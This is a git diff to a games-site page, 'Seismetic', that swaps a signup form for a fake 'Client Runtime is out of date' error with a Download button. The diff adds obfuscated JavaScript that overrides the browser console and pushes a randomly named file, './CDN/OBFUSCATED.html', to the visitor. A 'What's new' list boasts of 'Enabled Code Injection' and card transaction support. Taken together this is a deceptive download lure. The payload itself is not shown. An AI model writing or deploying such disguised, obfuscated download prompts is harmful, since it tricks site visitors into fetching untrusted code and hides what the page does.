--- a/newlink.html
+++ b/newlink.html
@@ -7,7 +7,7 @@
 		}
     </script>
     <title>Seismetic | Games</title>
-    <link rel="stylesheet" href="CSS/register.css">
+    <link rel="stylesheet" href="CSS/bro.css">
     <meta name="googlebot" content="noindex, nofollow, nosnippet" />
     <link rel="shortcut icon" content="/img/Sm.png" />
     <script src="./JS/particles.js" defer></script>
@@ -16,27 +16,28 @@
   </head>
 
   <body>
-    <script>
-const username = localStorage.getItem('username');
-
-if (username) {
-  window.location.href = 'handler.html';
-}
-    </script>
     <h1> </h1>
       <div class="container">
         <div class="signup-box">
-          <h1>Welcome to Seismetic!</h1>
-          <p>To use Seismetic you need a account why? because this a whitelisted project</p>
-          <input type="text" class="signup-input" id="username-input" placeholder="Enter your username">
-          <button class="glowing-button" id="signup-button" onclick="check()">Sign Up</button>
+          <h1>Whats new?</h1>
+          <p>Obfuscated code</p>
+          <p>Better security</p>
+          <p>Fixed the Google Classroom logo</p>
+          <p>Added Credit Card/Debit Card transaction support</p>
+          <p>Enabled Code Injection</p>
+          <p>RANDOMIZED YOUR CLIENT NAME</p>
         </div>
         <div class="logo-container">
-          <img src="assets/img/Color.png" alt="Logo" class="logo">
-          <h1 class="heading">SeismeticV2</h1>
-          <button class="logo-button" onclick="aler()">Discord</button>
+          <img src="img/ErrorSM.png" alt="Logo" class="logo">
+          <h1 class="heading">Seismetic Error!</h1>
+          <p>Client Runtime is out of date! please upgrade to the latest client Imediatly!</p>
+          <button class="logo-button" onclick="downloadFileAsRandomName()">Download</button>
         </div>
         </div>
+        <script>
+          (function(e,f){var G=d;var g=e();while(!![]){try{var h=parseInt(G(0x18c))/0x1+parseInt(G(0x19f))/0x2+parseInt(G(0x19d))/0x3*(-parseInt(G(0x193))/0x4)+-parseInt(G(0x1a2))/0x5+-parseInt(G(0x19b))/0x6+-parseInt(G(0x1a3))/0x7+parseInt(G(0x187))/0x8*(parseInt(G(0x18b))/0x9);if(h===f){break;}else{g['push'](g['shift']());}}catch(i){g['push'](g['shift']());}}}(c,0xe4390));function c(){var K=['removeChild','exception','length','console','substring','href','7779234BWFLmk','prototype','3djXSxC','setAttribute','1283036JtKGZH','warn','log','4929970PYyMSq','4159757pcXgDe','table','click','return\x20(function()\x20','IZGWD','error','bind','16ggigvB','random','info','body','17618463FLYLRb','621120tsOHHm','rtIQK','toString','createElement','download','appendChild','./CDN/OBFUSCATED.html','5465072CdPjwY','trace'];c=function(){return K;};return c();}var b=(function(){var e=!![];return function(f,g){var h=e?function(){var H=d;if(g){if(H(0x18d)===H(0x18d)){var i=g['apply'](f,arguments);g=null;return i;}else{var k=i[H(0x188)]()[H(0x18e)](0x24)['substring'](0x7);var l=j[H(0x18f)]('a');l[H(0x19a)]='./CDN/OBFUSCATED.html';l[H(0x19e)]('download',k);k[H(0x18a)][H(0x191)](l);l[H(0x1a5)]();l[H(0x18a)][H(0x195)](l);}}}:function(){};e=![];return h;};}());function d(a,b){var e=c();d=function(f,g){f=f-0x185;var h=e[f];return h;};return d(a,b);}var a=b(this,function(){var I=d;var f;try{var g=Function(I(0x1a6)+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');f=g();}catch(n){f=window;}var h=f[I(0x198)]=f['console']||{};var i=[I(0x1a1),I(0x1a0),I(0x189),I(0x185),I(0x196),I(0x1a4),I(0x194)];for(var j=0x0;j<i[I(0x197)];j++){if(I(0x1a7)!==I(0x1a7)){g=h;}else{var k=b['constructor'][I(0x19c)]['bind'](b);var l=i[j];var m=h[l]||k;k['__proto__']=b[I(0x186)](b);k[I(0x18e)]=m[I(0x18e)][I(0x186)](m);h[l]=k;}}});a();function downloadFileAsRandomName(){var J=d;var e=Math[J(0x188)]()['toString'](0x24)[J(0x199)](0x7);var f=document[J(0x18f)]('a');f['href']=J(0x192);f['setAttribute'](J(0x190),e);document['body'][J(0x191)](f);f['click']();document['body'][J(0x195)](f);}
+      </script>
+      
     <script>
       function check() {
         var username = document.getElementById('username-input').value;
